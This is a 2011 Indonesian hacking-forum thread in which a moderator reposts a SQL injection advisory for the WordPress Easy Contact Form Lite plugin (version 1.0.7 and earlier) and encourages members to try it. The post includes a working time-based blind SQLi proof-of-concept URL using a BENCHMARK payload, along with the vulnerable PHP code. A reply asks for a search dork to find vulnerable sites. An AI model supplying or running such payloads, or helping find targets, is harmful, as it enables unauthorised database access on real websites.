|
| | WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi |  |
| | | Pengirim | Message |
|---|
Black.exe
Global Mod
Jumlah posting : 844
Points : 1491
Reputation : 44
Join date : 08.01.11
Age : 35
|  Subyek: WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi  Thu Aug 18, 2011 4:53 pm | |
| numpang sharing exploit keren aja, hasil nemu di exploit-id  masih frsh gan exploitnya, monggo di coba... - Quote :
- # Exploit Title: WordPress Easy Contact Form Lite plugin <= 1.0.7 SQL Injection Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/easy-contact-form-lite.zip
# Version: 1.0.7 (tested)
---
PoC
---
http://www.site.com/wp-content/plugins/easy-contact-form-lite/requests/sort_row.request.php?field_num[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
---------------
Vulnerable code
---------------
foreach ($_POST['field_num'] as $position=>$field_id) {
if ($field_id > 0) {
$query = "
UPDATE $settings_table_name
SET position = '".$position."'
WHERE ID = $field_id";
$wpdb->query($query);
} semoga berguna. | |
| | | | nesta
VIP Member
Jumlah posting : 810
Points : 896
Reputation : 42
Join date : 04.08.11
Age : 37
Lokasi : depan komputer
| | Subyek: Re: WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi Thu Aug 18, 2011 6:00 pm | |
| 404 File not found om.... sekalian ama dorknya ya om  | |
| | | | | | WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi | |
|
Similar topics | |
|
| | Permissions in this forum: | Anda tidak dapat menjawab topik
| |
| |
| | Latest topics | » Baktrack TutorialSun Jul 28, 2019 2:26 am by kenta » aplikasi gambas pada linuxTue Apr 30, 2019 10:28 am by kenta » beli linux ubuntu terbaru di surabayaSun Mar 31, 2019 10:08 am by kenta » desain robotFri Jan 19, 2018 1:25 pm by kenta » membuat robot tidak susahFri Jan 19, 2018 1:15 pm by kenta » Salam.. Salam.. Salam..Thu Nov 30, 2017 7:42 am by BumiayuKita» teknologi penyaring udara dan airWed Oct 04, 2017 8:41 am by kenta » [CloudMILD] VPS SSD IIX 2X RAM + Xtra SSD SpaceMon Jul 24, 2017 10:46 am by BumiayuKita» cara menutup akses dari situs negatifTue Apr 04, 2017 1:04 pm by kenta » Aplikasi Google TalkMon Mar 20, 2017 3:00 am by BumiayuKita» Driver buat Webcam PC ?? merknya M-Tech,, Fri Jan 30, 2015 8:51 pm by aelgrim » Portal Blog,,,,,Sun Dec 14, 2014 12:38 am by robofics» Appteknodroid - Seputar Dunia AndroidMon Nov 10, 2014 11:32 pm by Pr0phecy » Software animasi yang agan2 pakeTue Sep 30, 2014 1:11 pm by X_campus » INDO BILLING 6.70 + KEYSun Sep 21, 2014 2:17 pm by abdul halim |
| Statistics | Total 12294 user terdaftar
User terdaftar terakhir adalah Adlygans
Total 31710 kiriman artikel dari user in 5734 subjects
|
| Banner Forum | Dukung forum Blackc0de dengan memasang bannernya.
|
| Social Networking | 
|
|
